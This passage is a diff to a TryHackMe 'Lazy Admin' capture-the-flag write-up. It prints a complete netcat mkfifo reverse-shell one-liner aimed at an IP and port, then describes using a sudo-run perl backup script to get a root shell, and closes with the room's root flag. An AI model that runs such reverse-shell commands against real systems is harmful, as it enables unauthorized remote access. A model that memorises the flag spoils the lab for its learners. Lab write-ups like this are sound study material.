leftermv/writeups/THM/Lazy Admin.md

 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
 ```

 It seems that it already has a reverse shell in this script.
-I just edited and placed my IP there.
+I just changed the 192...
+IP with my own.

 **sudo** /usr/bin/perl /home/itguy/backup.pl
 On our second listener, we got a second shell.
 This time, under root privileges.

 **Second and final flag is at /root/root.txt and is THM{6637f41d0177b6f37cb20d775124699f}** **[2]**.